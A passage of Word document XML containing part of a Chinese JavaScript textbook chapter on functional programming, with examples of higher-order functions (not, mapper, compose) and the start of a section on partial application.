      </w:pPr>
      <w:r>
        <w:t>var mean=reduce(data,sum)/data.length;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var deviations=map(data,function(x){return x-mea</w:t>
      </w:r>
      <w:r>
        <w:t>n;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var stddev=Math.sqrt(reduce(map(deviations,square),sum)/(data.length-1));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="218" w:name="8_8_2_Gao_Jie_Han_Shu_"/>
      <w:r>
        <w:t>8.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　高阶函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所谓高阶函数（</w:t>
      </w:r>
      <w:r>
        <w:t>higher-order function</w:t>
      </w:r>
      <w:r>
        <w:t>）就是操作函数的函数，它接收一个或多个函数作为参数，并返回一个新函数，来看这个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个高阶函数返回一个新的函数，这个新函数将它的实参传入</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并返回</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值的逻辑非</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function not(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:t>function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个新的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var result=f.apply(this,arguments);//</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return!result;//</w:t>
      </w:r>
      <w:r>
        <w:t>对结果求反</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var even=function(x){//</w:t>
      </w:r>
      <w:r>
        <w:t>判断</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>是否为偶数的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return x%2===0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var odd=not(even);//</w:t>
      </w:r>
      <w:r>
        <w:t>一个新函数，所做的事情和</w:t>
      </w:r>
      <w:r>
        <w:t>even()</w:t>
      </w:r>
      <w:r>
        <w:t>相反</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[1,1,3,5,5].every(odd);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>每个元素都是奇数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面的</w:t>
      </w:r>
      <w:r>
        <w:t>not()</w:t>
      </w:r>
      <w:r>
        <w:t>函数就是一个高阶函数，因为它接收一个函</w:t>
      </w:r>
      <w:r>
        <w:t>数作为参数，并返回一个新函数。另外一个例子，来看下面的</w:t>
      </w:r>
      <w:r>
        <w:t>mapper()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，它也是接收一个函数作为参数，并返回一个新函数，这个新</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>函数将一个数组映射到另一个使用这个函数的数组上。这个函数使用了之前定义的</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，但要首先理解这两个函数有哪里不同，理解这一点至关重要：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>所返回的函数的参数应当是一个实参数组，并对每个数组元素执行函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并返回所有计算结果组成的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>可以对比一下这个函数和上文提到的</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function mapper(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return function(a){</w:t>
      </w:r>
      <w:r>
        <w:t>return map(a,f);};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var increment=function(x){return x+1;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var incrementer=mapper(increment);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>incrementer([1,2,3])//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>[2,3,4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里是一个更常见的例子，它接收两个函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>g()</w:t>
      </w:r>
      <w:r>
        <w:t>，并返回一个新的函数用以计算</w:t>
      </w:r>
      <w:r>
        <w:t>f(g())</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个新的可以计算</w:t>
      </w:r>
      <w:r>
        <w:t>f(g(...))</w:t>
      </w:r>
      <w:r>
        <w:t>的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回的函数</w:t>
      </w:r>
      <w:r>
        <w:t>h()</w:t>
      </w:r>
      <w:r>
        <w:t>将它所有的实参传入</w:t>
      </w:r>
      <w:r>
        <w:t>g()</w:t>
      </w:r>
      <w:r>
        <w:t>，然后将</w:t>
      </w:r>
      <w:r>
        <w:t>g()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值传入</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>g()</w:t>
      </w:r>
      <w:r>
        <w:t>时的</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>his</w:t>
      </w:r>
      <w:r>
        <w:t>值和调用</w:t>
      </w:r>
      <w:r>
        <w:t>h()</w:t>
      </w:r>
      <w:r>
        <w:t>时的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值是同一个</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function compose(f,g){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>需要给</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>传入一个参数，所以使用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>需要给</w:t>
      </w:r>
      <w:r>
        <w:t>g()</w:t>
      </w:r>
      <w:r>
        <w:t>传入很多参数，所以使用</w:t>
      </w:r>
      <w:r>
        <w:t>g()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return f.call(this,g.apply(this,arguments));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var square=function(x){return x*x;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sum=function(x,y){return x+y;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var squareofsum=compose(square,sum);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>squareofsum(2,3)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>本章后续几节中定义了</w:t>
      </w:r>
      <w:r>
        <w:t>partial()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>memoize()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，这两个函数是非常重要的高阶函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="219" w:name="8_8_3_Bu_Wan_Quan_Han_Shu_"/>
      <w:r>
        <w:t>8.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　不完全函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>8.7.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）的</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回一个新函数，给新函数传入特定的上下文和一组指定的参数，然后调用函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>。我们说它把函数</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>绑定至</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>对象并传入一部分参数。</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法只是将实参放在（完整实参列表的）左侧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[19]</w:t>
      </w:r>
      <w:r>
        <w:t>，也就是说传入</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>的实参都是放</w:t>
      </w:r>
      <w:r>
        <w:t>在传入原始函数的实参列表开始的位置，但有时我们期望将传入</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>的实参放在（完整实参列表的）右侧：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>实现一个工具函数将类数组对象（或对象）转换为真正的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在后面的示例代码中用到了这个方法将</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象转换为真正的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function array(a,n){return Array.prototype.slice.call(a,n||0);}//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数的实参传递至左侧</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function partialLeft(f/*,...*/){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var args=arguments;//</w:t>
      </w:r>
      <w:r>
        <w:t>保存</w:t>
      </w:r>
      <w:r>
        <w:t>外部的实参数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>并返回这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=array(args,1);//</w:t>
      </w:r>
      <w:r>
        <w:t>开始处理外部的第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=a.concat(array(arguments));//</w:t>
      </w:r>
      <w:r>
        <w:t>然后增加所有的内部实参</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return f.apply(this,a);//</w:t>
      </w:r>
      <w:r>
        <w:t>然后基于这个实参列表调用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数的实参传递至右侧</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function partialRight(f/*,...*/){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var args=arguments;//</w:t>
      </w:r>
      <w:r>
        <w:t>保存外部实参数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:t>function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>返回这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=array(arguments);//</w:t>
      </w:r>
      <w:r>
        <w:t>从内部参数开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=a.concat(array(args,1));//</w:t>
      </w:r>
      <w:r>
        <w:t>然后从外部第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>开始添加</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>return f.apply(this,a);//</w:t>
      </w:r>
      <w:r>
        <w:t>最后基于这个实参列表调用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数的实参被用做模板</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>实参列表中的</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值都被填充</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function partial(f/*,...*/){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var args=arguments;//</w:t>
      </w:r>
      <w:r>
        <w:t>保存外部实参数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return function</w:t>
      </w:r>
      <w:r>
        <w:t>(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=array(args,1);//</w:t>
      </w:r>
      <w:r>
        <w:t>从外部</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i=0,j=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>，从内部实参填充</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a.length;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a[i]===undefined)a[i]=arguments[j++];//</w:t>
      </w:r>
      <w:r>
        <w:t>现在将剩下的内部实参都追加进去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=a.concat(array(arguments,j))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return f.apply(this,a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数带有三个实参</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
